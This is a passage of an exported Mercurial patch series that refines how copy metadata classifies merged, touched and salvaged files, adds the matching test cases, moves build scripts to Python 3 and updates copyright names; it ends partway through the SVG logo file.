'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg revert --rev 'desc("b-1")' d + $ echo "new content for d after the revert" > d + $ hg ci -m "mCB-change-m-0 $case_desc - one way" + created new head + $ hg manifest --rev . --debug | grep " d" + e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !) + 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !) + + $ hg up 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("c-1")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg revert --rev 'desc("b-1")' d + $ echo "new content for d after the revert" > d + $ hg ci -m "mBC-change-m-0 $case_desc - the other way" + created new head + $ hg manifest --rev . --debug | grep " d" + e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !) + 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !) + + + $ hg up null --quiet + $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))' + o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + |\ + +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + | |/ + | o c-1 delete d + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ @@ -1006,7 +1063,7 @@ (extra unrelated changes) $ hg up 'desc("a-2")' - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo j > unrelated-j $ hg add unrelated-j $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' @@ -1493,6 +1550,7 @@ mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d @@ -1501,6 +1559,7 @@ mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d @@ -1925,6 +1984,32 @@ merged : d, ; (upgraded-parallel known-bad-output !) '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) merged : d, ; (upgraded known-bad-output !) + ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) + salvaged : d, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) + merged : d, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) + salvaged : d, ; (upgraded missing-correct-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) + merged : d, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) + salvaged : d, ; (upgraded-parallel missing-correct-output !) + ##### revision "mBC-change-m-0 merge explicitely revive deleted file - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) + salvaged : d, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) + merged : d, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) + salvaged : d, ; (upgraded missing-correct-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) + merged : d, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) + salvaged : d, ; (upgraded-parallel missing-correct-output !) ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3443,6 +3528,65 @@ #endif +Subcase: restoring and untouched deleted file, while touching it +```````````````````````````````````````````````````````````````` + +Merge: +- one removing a file (d) +- one leaving the file untouched +- the merge actively restore the file to the same content. + +In this case, the file keep on living after the merge. So we should not drop its +copy tracing chain. + + $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))' + o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + |\ + +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + | |/ + | o c-1 delete d + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +'a' is the the copy source of 'd' + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-change-m-0")' + M b + A d + a (no-compatibility no-changeset no-upgraded no-upgraded-parallel !) + a (upgraded missing-correct-output !) + a (upgraded-parallel missing-correct-output !) + A t + p + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-change-m-0")' + M b + A d + a (no-compatibility no-changeset !) + A t + p + R a + R p + $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-change-m-0")' + M b + A d + $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mBC-change-m-0")' + M b + A d + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mCB-change-m-0")' + M d + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBC-change-m-0")' + M d + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615811865 -3600 # Mon Mar 15 13:37:45 2021 +0100 # Node ID c52c3c4cbd3f269b673971073939b95948e95202 # Parent 316a768f2e43e1bb308b9f1265df5100ea43601e copies: detect files as `touched/salvaged` if they only existed on one side The file cannot be merged if there was content to merge on the other side. So the previous record was wrong. In the general case, the file existed only on one side and got touched during the merge. So it should detected as touched. They are a special case where the merge manually prevent the file to be deleted. In this case the file is marked as `salvaged`. The result of this `salvaged` recording, copy-tracing-wise, is the same as recording it as `merged`. This is probably why they were recorded as `merged` in the first place. Differential Revision: https://phab.mercurial-scm.org/D10219 diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -322,12 +322,12 @@ │ (Some, None) │ OR │🄻 Deleted │ ø │ ø │ │ │🄷 Deleted[1] │ │ │ │ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │🄸 No Changes │ │ │ │ - │ (None, Some) │ OR │ ø │🄼 Added │🄽 Merged │ + │ │🄸 No Changes │ │ │ 🄽 Touched │ + │ (None, Some) │ OR │ ø │🄼 Added │OR 🅀 Salvaged │ │ │🄹 Salvaged[2]│ │ (copied?) │ (copied?) │ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │ │ │ │ │ - │ (Some, Some) │🄺 No Changes │ ø │🄾 Merged │🄿 Merged │ + │ │ │ │ 🄾 Touched │ │ + │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │🄿 Merged │ │ │ [3] │ │ (copied?) │ (copied?) │ └──────────────┴──────────────┴──────────────┴──────────────┴──────────────┘ @@ -454,8 +454,16 @@ # case 🄻 — both deleted the file. md.mark_removed(filename) elif d1[1][0] is not None and d2[1][0] is not None: - # case 🄽 🄾 🄿 - md.mark_merged(filename) + if d1[0][0] is None or d2[0][0] is None: + if any(_find(ma, filename) is not None for ma in mas): + # case 🅀 or 🅁 + md.mark_salvaged(filename) + else: + # case 🄽 🄾 : touched + md.mark_touched(filename) + else: + # case 🄿 : merged + md.mark_merged(filename) copy_candidates.append(filename) else: # Impossible case, the post-merge file status cannot be None on diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1987,29 +1987,13 @@ ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) - salvaged : d, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) - merged : d, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) - salvaged : d, ; (upgraded missing-correct-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) - merged : d, ; (upgraded-parallel known-bad-output !) - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) - salvaged : d, ; (upgraded-parallel missing-correct-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' + salvaged : d, ; ##### revision "mBC-change-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) - salvaged : d, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) - merged : d, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) - salvaged : d, ; (upgraded missing-correct-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) - merged : d, ; (upgraded-parallel known-bad-output !) - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) - salvaged : d, ; (upgraded-parallel missing-correct-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' + salvaged : d, ; ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -2031,21 +2015,13 @@ ##### revision "mEA,Jm" ##### 1 sidedata entries entry-0014 size 24 - '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (no-upgraded no-upgraded-parallel !) - touched : unrelated-j, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded known-bad-output !) - merged : unrelated-j, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded-parallel known-bad-output !) - merged : unrelated-j, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + touched : unrelated-j, ; ##### revision "mJ,EAm" ##### 1 sidedata entries entry-0014 size 24 - '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (no-upgraded no-upgraded-parallel !) - touched : unrelated-j, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded known-bad-output !) - merged : unrelated-j, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded-parallel known-bad-output !) - merged : unrelated-j, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + touched : unrelated-j, ; ##### revision "s-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3560,9 +3536,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-change-m-0")' M b A d - a (no-compatibility no-changeset no-upgraded no-upgraded-parallel !) - a (upgraded missing-correct-output !) - a (upgraded-parallel missing-correct-output !) + a (no-compatibility no-changeset !) A t p R a # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615601820 -3600 # Sat Mar 13 03:17:00 2021 +0100 # Node ID 433cef8f3104bed1560e4403b8870cf8c4bf688d # Parent c52c3c4cbd3f269b673971073939b95948e95202 copies: distinguish between merged and touched files during upgrade This a filenode being different between p1, p2 and result does not necessarily means a merges happens. For example p2 could be a strict newer version of p1, so the p2 version is picked by the manifest merging, but then the file is manually updated before the commit. In this case the file should be detected as touched. Differential Revision: https://phab.mercurial-scm.org/D10220 diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -326,8 +326,8 @@ │ (None, Some) │ OR │ ø │🄼 Added │OR 🅀 Salvaged │ │ │🄹 Salvaged[2]│ │ (copied?) │ (copied?) │ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │ │ │ 🄾 Touched │ │ - │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │🄿 Merged │ + │ │ │ │ 🄾 Touched │ 🄿 Merged │ + │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │OR 🅂 Touched │ │ │ [3] │ │ (copied?) │ (copied?) │ └──────────────┴──────────────┴──────────────┴──────────────┴──────────────┘ @@ -415,6 +415,7 @@ nice bonus. However do not any of this yet. """ + repo = ctx.repo() md = ChangingFiles() m = ctx.manifest() @@ -462,8 +463,15 @@ # case 🄽 🄾 : touched md.mark_touched(filename) else: - # case 🄿 : merged - md.mark_merged(filename) + fctx = repo.filectx(filename, fileid=d1[1][0]) + if fctx.p2().rev() == nullrev: + # case 🅂 + # lets assume we can trust the file history. If the + # filenode is not a merge, the file was not merged. + md.mark_touched(filename) + else: + # case 🄿 + md.mark_merged(filename) copy_candidates.append(filename) else: # Impossible case, the post-merge file status cannot be None on diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1965,25 +1965,13 @@ ##### revision "mBF-change-m-0 merge with extra change - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) - touched : d, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) - touched : d, ; (upgraded missing-correct-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) - merged : d, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) - touched : d, ; (upgraded-parallel missing-correct-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) - merged : d, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' + touched : d, ; ##### revision "mFB-change-m-0 merge with extra change - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) - touched : d, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) - merged : d, ; (upgraded-parallel known-bad-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) - merged : d, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' + touched : d, ; ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 @@ -3418,10 +3406,8 @@ A d h (filelog !) h (sidedata !) - a (upgraded known-bad-output !) - h (upgraded missing-correct-output !) - a (upgraded-parallel known-bad-output !) - h (upgraded-parallel missing-correct-output !) + h (upgraded !) + h (upgraded-parallel !) h (changeset !) h (compatibility !) A t # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616444051 25200 # Mon Mar 22 13:14:11 2021 -0700 # Node ID ea8bfd33c22a7b2c62c9b26493d7f46bb97b98d4 # Parent 433cef8f3104bed1560e4403b8870cf8c4bf688d tests: replace some `python` by `"$PYTHON"` to not only use Python 2 I deleted my `python` binary as a test and a few tests started failing. Differential Revision: https://phab.mercurial-scm.org/D10250 diff --git a/tests/test-convert-cvs.t b/tests/test-convert-cvs.t --- a/tests/test-convert-cvs.t +++ b/tests/test-convert-cvs.t @@ -521,7 +521,7 @@ |cp932 |\x82\xa0 | x x o | $ mkdir -p cvsrepo/transcoding - $ python <<EOF + $ "$PYTHON" <<EOF > fp = open('cvsrepo/transcoding/file,v', 'wb') > fp.write((b''' > head 1.4; diff --git a/tests/test-merge-tools.t b/tests/test-merge-tools.t --- a/tests/test-merge-tools.t +++ b/tests/test-merge-tools.t @@ -1921,7 +1921,7 @@ Binary files capability checking $ hg update -q -C 0 - $ python <<EOF + $ "$PYTHON" <<EOF > with open('b', 'wb') as fp: > fp.write(b'\x00\x01\x02\x03') > EOF @@ -1929,7 +1929,7 @@ $ hg commit -qm "add binary file (#1)" $ hg update -q -C 0 - $ python <<EOF + $ "$PYTHON" <<EOF > with open('b', 'wb') as fp: > fp.write(b'\x03\x02\x01\x00') > EOF # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616444472 25200 # Mon Mar 22 13:21:12 2021 -0700 # Node ID dc101c236219512ecd0427b96d9d8121bd6290f6 # Parent ea8bfd33c22a7b2c62c9b26493d7f46bb97b98d4 makefile: use Python 3 by default when building docs as well I copied the snippet defining `PYTHON` from the root Makefile. Differential Revision: https://phab.mercurial-scm.org/D10251 diff --git a/doc/Makefile b/doc/Makefile --- a/doc/Makefile +++ b/doc/Makefile @@ -6,7 +6,14 @@ PREFIX=/usr/local MANDIR=$(PREFIX)/share/man INSTALL=install -m 644 -PYTHON?=python +# Default to Python 3. +# +# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is. +ifeq ($(OS),Windows_NT) +PYTHON?=py -3 +else +PYTHON?=python3 +endif RSTARGS= export HGENCODING=UTF-8 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616452145 25200 # Mon Mar 22 15:29:05 2021 -0700 # Node ID 1977495dbbe272bc0969091e163b4620dcecc260 # Parent dc101c236219512ecd0427b96d9d8121bd6290f6 fuzz: use Python 3 in makefile As in the previous patch, I copied the snippet defining `PYTHON` from the root Makefile. Differential Revision: https://phab.mercurial-scm.org/D10252 diff --git a/contrib/fuzz/Makefile b/contrib/fuzz/Makefile --- a/contrib/fuzz/Makefile +++ b/contrib/fuzz/Makefile @@ -10,6 +10,15 @@ # OSS-Fuzz will define its own value for LIB_FUZZING_ENGINE. LIB_FUZZING_ENGINE ?= standalone_fuzz_target_runner.o +# Default to Python 3. +# +# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is. +ifeq ($(OS),Windows_NT) +PYTHON?=py -3 +else +PYTHON?=python3 +endif + PYTHON_CONFIG ?= $$OUT/sanpy/bin/python-config PYTHON_CONFIG_FLAGS ?= --ldflags --embed @@ -20,7 +29,7 @@ standalone_fuzz_target_runner.o: standalone_fuzz_target_runner.cc $$OUT/%_fuzzer_seed_corpus.zip: %_corpus.py - python $< $@ + $(PYTHON) $< $@ pyutil.o: pyutil.cc pyutil.h $(CXX) $(CXXFLAGS) -g -O1 \ # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1616691728 -3600 # Thu Mar 25 18:02:08 2021 +0100 # Node ID d4ba4d51f85fc65935b79aff03c7f3d1bd14a642 # Parent 1977495dbbe272bc0969091e163b4620dcecc260 contributor: change mentions of mpm to olivia Matt Mackall is now Olivia Mackall. I reached out to her about changing the copyright notices to reflect this change and she gave me the green light, so I changed everything relevant. Differential Revision: https://phab.mercurial-scm.org/D10266 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -187,7 +187,7 @@ $(PYFILESCMD) | xargs \ xgettext --package-name "Mercurial" \ --msgid-bugs-address "<mercurial-devel@mercurial-scm.org>" \ - --copyright-holder "Matt Mackall <mpm@selenic.com> and others" \ + --copyright-holder "Olivia Mackall <olivia@selenic.com> and others" \ --from-code ISO-8859-1 --join --sort-by-file --add-comments=i18n: \ -d hg -p i18n -o hg.pot.tmp $(PYTHON) i18n/posplit i18n/hg.pot.tmp diff --git a/contrib/all-revsets.txt b/contrib/all-revsets.txt --- a/contrib/all-revsets.txt +++ b/contrib/all-revsets.txt @@ -46,8 +46,8 @@ # Used in revision c1546d7400ef min(0::) # Used in revision 546fa6576815 -author(lmoscovicz) or author(mpm) -author(mpm) or author(lmoscovicz) +author(lmoscovicz) or author(olivia) +author(olivia) or author(lmoscovicz) # Used in revision 9bfe68357c01 public() and id("d82e2223f132") # Used in revision ba89f7b542c9 @@ -100,7 +100,7 @@ draft() and ::tip ::tip and draft() author(lmoscovicz) -author(mpm) +author(olivia) ::p1(p1(tip)):: public() :10000 and public() @@ -130,7 +130,7 @@ head() head() - public() draft() and head() -head() and author("mpm") +head() and author("olivia") # testing the mutable phases set draft() diff --git a/contrib/base-revsets.txt b/contrib/base-revsets.txt --- a/contrib/base-revsets.txt +++ b/contrib/base-revsets.txt @@ -25,9 +25,9 @@ 0::tip roots(0::tip) author(lmoscovicz) -author(mpm) -author(lmoscovicz) or author(mpm) -author(mpm) or author(lmoscovicz) +author(olivia) +author(lmoscovicz) or author(olivia) +author(olivia) or author(lmoscovicz) tip:0 0:: # those two `roots(...)` inputs are close to what phase movement use. diff --git a/contrib/check-code.py b/contrib/check-code.py --- a/contrib/check-code.py +++ b/contrib/check-code.py @@ -2,7 +2,7 @@ # # check-code - a style and portability checker for Mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/check-commit b/contrib/check-commit --- a/contrib/check-commit +++ b/contrib/check-commit @@ -1,6 +1,6 @@ #!/usr/bin/env python3 # -# Copyright 2014 Matt Mackall <mpm@selenic.com> +# Copyright 2014 Olivia Mackall <olivia@selenic.com> # # A tool/hook to run basic sanity checks on commits/patches for # submission to Mercurial. Install by adding the following to your diff --git a/contrib/check-config.py b/contrib/check-config.py --- a/contrib/check-config.py +++ b/contrib/check-config.py @@ -2,7 +2,7 @@ # # check-config - a config flag documentation checker for Mercurial # -# Copyright 2015 Matt Mackall <mpm@selenic.com> +# Copyright 2015 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/hg-test-mode.el b/contrib/hg-test-mode.el --- a/contrib/hg-test-mode.el +++ b/contrib/hg-test-mode.el @@ -1,6 +1,6 @@ ;; hg-test-mode.el - Major mode for editing Mercurial tests ;; -;; Copyright 2014 Matt Mackall <mpm@selenic.com> +;; Copyright 2014 Olivia Mackall <olivia@selenic.com> ;; "I have no idea what I'm doing" ;; ;; This software may be used and distributed according to the terms of the diff --git a/contrib/hgperf b/contrib/hgperf --- a/contrib/hgperf +++ b/contrib/hgperf @@ -2,7 +2,7 @@ # # hgperf - measure performance of Mercurial commands # -# Copyright 2014 Matt Mackall <mpm@selenic.com> +# Copyright 2014 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/logo-droplets.svg b/contrib/logo-droplets.svg --- a/contrib/logo-droplets.svg +++ b/contrib/logo-droplets.svg @@ -1,5 +1,5 @@ <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!-- Created with Inkscape (http://www.inkscape.org/) --> -<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Matt Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata> +<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Olivia Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata> <rect id="rect6847" stroke-linejoin="miter" style="stroke-dasharray:none;" height="150.12" width="124.77" stroke="#000" stroke-miterlimit="4" y="0.98776" x="0.3169" stroke-width="1.9755" fill="#FFF"/><path id="text2611" style="stroke-dasharray:none;" d="M9.848,124.61c1.777-0.79,3.665-1.18,5.479-1.18,1.74,0,2.851,0.43,3.48,1.32,1.332-0.89,3.146-1.32,4.553-1.32,4.221,0,4.369,1.71,4.369,6.73v11.11c0,0.49,0.074,0.49-2.036,0.49v-11.81c0-3.63-0.074-4.74-2.48-4.74-1.073,0-2.184,0.25-3.369,1.03v15.27c-0.037,0.15-0.111,0.18-0.369,0.22-0.038,0-0.074,0.03-0.112,0.03h-1.555v-11.81c0-3.49,0-4.77-2.517-4.77-1.074,0-2.147,0.21-3.406,0.82v15.27c0,0.49,0.074,0.49-2.0361,0.49v-17.15m27.831-1.18c-3.146,0-6.626,0.89-6.626,10.4,0,7.33,2.554,8.47,6.071,8.47,2.701,0,5.034-0.89,5.034-1.32,0-0.53-0.074-1.35-0.259-1.82-1.148,0.79-2.777,1.21-4.59,1.21-2.48,0-4.146-0.71-4.184-6.22,1.629,0,5.776-0.04,8.848-0.65,0.259-1.17,0.37-2.88,0.37-4.37,0-3.56-1.444-5.7-4.664-5.7m-0.185,1.78c2.221,0,2.813,1.46,2.85,4.31,0,0.75-0.037,1.64-0.148,2.49-2.073,0.5-5.591,0.5-7.072,0.5,0.261-6.48,2.481-7.3,4.37-7.3m8.07-0.21c1.739-1.14,3.332-1.57,4.961-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.112,0.96-0.297,1.31-0.519-0.28-1.11-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m18.69-0.39c0-0.47-1.554-1.18-3.11-1.18-2.999,0-6.664,1.03-6.664,9.83,0,8.33,2.222,9.07,6.109,9.07,1.924,0,3.665-1.03,3.665-1.6,0-0.32-0.074-0.82-0.26-1.24-0.778,0.56-1.962,1.1-3.22,1.1-2.665,0-4.22-0.